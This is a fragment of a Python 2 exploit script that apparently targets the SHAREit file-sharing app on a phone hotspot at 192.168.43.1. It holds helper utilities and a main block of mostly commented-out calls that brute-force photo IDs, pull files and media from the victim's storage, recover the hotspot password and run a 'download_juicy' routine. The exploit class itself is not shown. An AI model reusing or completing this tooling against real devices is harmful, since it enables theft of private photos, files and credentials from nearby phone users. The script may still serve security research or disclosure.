#------------------------ Begin Func get_stats ----------------------------------
#------------------------ End Func get_stats ----------------------------------
class helper:
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
@staticmethod
def base64_decode(string):
return base64.b64decode(string + '='*(len(string)%4))
@staticmethod
def ascii2hex(string):
return ''.join([str(('0'+hex(ord(letter))[2:])[-2:]).upper() for letter in string])
@staticmethod
def hex2ascii(string):
string = re.sub(r'[^a-fA-F0-9]+','',string)
string = "0"*(len(string)%2) + string
return ''.join([chr(int(string[i:i+2],16)) for i in xrange(0,len(string),2)])
@staticmethod
def get_char(index):
index = int(index) % (len(helper.charset)-1)
return helper.charset[index]
@staticmethod
def get_ord(char):
return helper.charset.index(char)
@staticmethod
def mkdir(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
@staticmethod
def translate_path(path):
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
#Commented since we prefer to make the path relative to exploit directory not current working directory
#path = os.getcwd()
path = os.path.dirname(os.path.realpath(__file__))
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir): continue
path = os.path.join(path, word)
return path
if __name__ == '__main__':
#print exploit.discover_networks()
#for i in xrange(205000,206000):
# res = exploit.get_asset('192.168.43.1:2999','photo',i,'thumb')
# if res is not None and len(res) > 0:
# print str(i) + ':' + exploit.save_file(None,res,{'prefix':'DumpIt_thumb_','suffix':'.jpg'})
#res = exploit.get_asset('192.168.43.1','file','/storage/emulated/0/x-03.kismet.netxml','raw',True)
#print res
#print exploit.save_file(None,res)
#media = exploit.list_media_from_db('192.168.43.1:2999')
#for mediaid, item in media.iteritems():
# if item['media_type'] == 'video':
# print 'Retrieving %d' % item['id']
# exploit.save_file(None,exploit.get_asset('192.168.43.1:2999','video',item['id'],'thumb'),{'prefix':'DumpIt_thumb_','suffix':'.jpg'})
#print exploit.get_hotspot_pass('EmqA9-MTIzNDU2')
#print ','.join([str(helper.get_ord(x)) for x in 'F5NO'])
#print exploit.parse_ssid('BkAk-MTIzNDU2')
try:
#print exploit.scan_ip_range('192.168.43.1')
#x = SHAREitResponder()
#time.sleep(10)
#print exploit.responder_pool_messages
#x.stop()
print 'ready'
"""
id_from = 1
id_to = 2000
id_step = 20
while id_from < 500000:
exploit.brute_assets('192.168.43.1','tmp','photo',id_from,id_to,id_step)
oldfrom = id_from
id_from = id_to + 1
id_to = 2 * id_to - oldfrom
"""
#print exploit.list_media_from_db('192.168.43.1','video')
#print exploit.brute_assets('192.168.43.1','tmp','photo',204000,205000,50)
#print exploit.auto_connect('192.168.43.165','192.168.43.1')
#print exploit.get_hotspot_info('192.168.43.1')
#print exploit.save_asset('192.168.43.1','tmp','file','/storage/emulated/0/x-03.kismet.netxml','raw')
#print exploit.download_juicy('192.168.43.1')
except KeyboardInterrupt:
print 'Keyboard interrupt detected, fail safe'